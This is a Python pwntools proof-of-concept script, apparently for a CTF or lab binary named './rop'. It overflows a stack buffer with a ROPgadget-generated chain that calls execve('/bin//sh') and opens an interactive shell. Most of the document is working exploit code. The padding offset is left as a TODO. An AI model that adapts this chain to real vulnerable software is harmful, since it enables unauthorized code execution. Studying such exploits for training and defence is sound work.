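#!/usr/bin/env python3
# execve generated by ROPgadget
#
# Stack-overflow PoC for ./rop: the payload overwrites the saved return
# address with a ROP chain that performs execve("/bin//sh", argv, envp),
# where argv and envp both point at an 8-byte NULL staged in .data.
#
# Every address below is absolute, so the chain is only valid for the exact
# build of ./rop the gadgets were harvested from (and only if that build is
# loaded at these addresses, i.e. not PIE). Re-run ROPgadget after any
# rebuild of the target.
from struct import pack  # unused by the chain; kept from the generated template
from pwn import *

BINARY = './rop'

# Gadget addresses, as emitted by ROPgadget.
POP_RSI = 0x00000000004077ce       # pop rsi ; ret
POP_RAX = 0x00000000004437e3       # pop rax ; ret
POP_RDI = 0x00000000004017de       # pop rdi ; ret
POP_RDX = 0x00000000004016fb       # pop rdx ; ret
MOV_RSI_RAX = 0x0000000000445171   # mov qword ptr [rsi], rax ; ret
XOR_RAX = 0x0000000000439720       # xor rax, rax ; ret
ADD_RAX_1 = 0x00000000004660d0     # add rax, 1 ; ret
SYSCALL = 0x000000000040120b       # syscall

# Writable scratch area used to stage the "/bin//sh" string and the NULL
# that terminates it and doubles as the argv/envp array.
DATA = 0x00000000004b2000          # @ .data
DATA_NULL = DATA + 8               # @ .data + 8

# x86-64 syscall number for execve. The generated chain reaches this value
# by unrolling one `add rax, 1` gadget per increment; naming it removes the
# off-by-one risk of hand-counting a long run of identical gadgets.
SYS_EXECVE = 59

# Bytes between the start of the overflowed buffer and the saved return
# address. ROPgadget cannot know this ("Padding goes here"), and the
# generated script sent the chain with no padding at all, so it would only
# land on the return address if that offset happened to be zero.
# TODO: set this to the offset measured for ./rop (e.g. with a cyclic pattern).
PADDING = b''


def build_chain(padding: bytes = PADDING) -> bytes:
    """Return ``padding`` followed by the execve ROP chain.

    The chain follows the ROPgadget layout exactly:
      1. write "/bin//sh" to .data
      2. write 8 NULL bytes to .data+8
      3. rdi = .data (path), rsi = .data+8 (argv = {NULL}), rdx = .data+8 (envp = {NULL})
      4. rax = SYS_EXECVE via xor + repeated add
      5. syscall
    """
    chain = b''
    # 1. [.data] = "/bin//sh" (8 bytes, popped straight into rax)
    chain += p64(POP_RSI) + p64(DATA)
    chain += p64(POP_RAX) + b'/bin//sh'
    chain += p64(MOV_RSI_RAX)
    # 2. [.data+8] = 0: NUL-terminates the path and is the argv/envp terminator
    chain += p64(POP_RSI) + p64(DATA_NULL)
    chain += p64(XOR_RAX)
    chain += p64(MOV_RSI_RAX)
    # 3. execve(path, argv, envp)
    chain += p64(POP_RDI) + p64(DATA)
    chain += p64(POP_RSI) + p64(DATA_NULL)
    chain += p64(POP_RDX) + p64(DATA_NULL)
    # 4. rax = SYS_EXECVE
    chain += p64(XOR_RAX) + p64(ADD_RAX_1) * SYS_EXECVE
    # 5. syscall
    chain += p64(SYSCALL)
    return padding + chain


def main() -> None:
    """Build the payload, launch ./rop, deliver the chain and hand over the tty."""
    payload = build_chain()
    # sendline() terminates the payload with '\n'. If ./rop reads its input
    # with a line-oriented call, a 0x0a byte anywhere inside the chain would
    # cut it short, so refuse to send such a payload rather than debug a
    # silently truncated chain. The current gadget/address set contains none.
    if b'\n' in payload:
        raise ValueError('payload contains 0x0a; a line-oriented read would truncate the chain')
    # Launch only after the payload is known-good so a build error does not
    # leave a stray ./rop process behind.
    r = process(BINARY)
    r.sendline(payload)
    r.interactive()


if __name__ == '__main__':
    main()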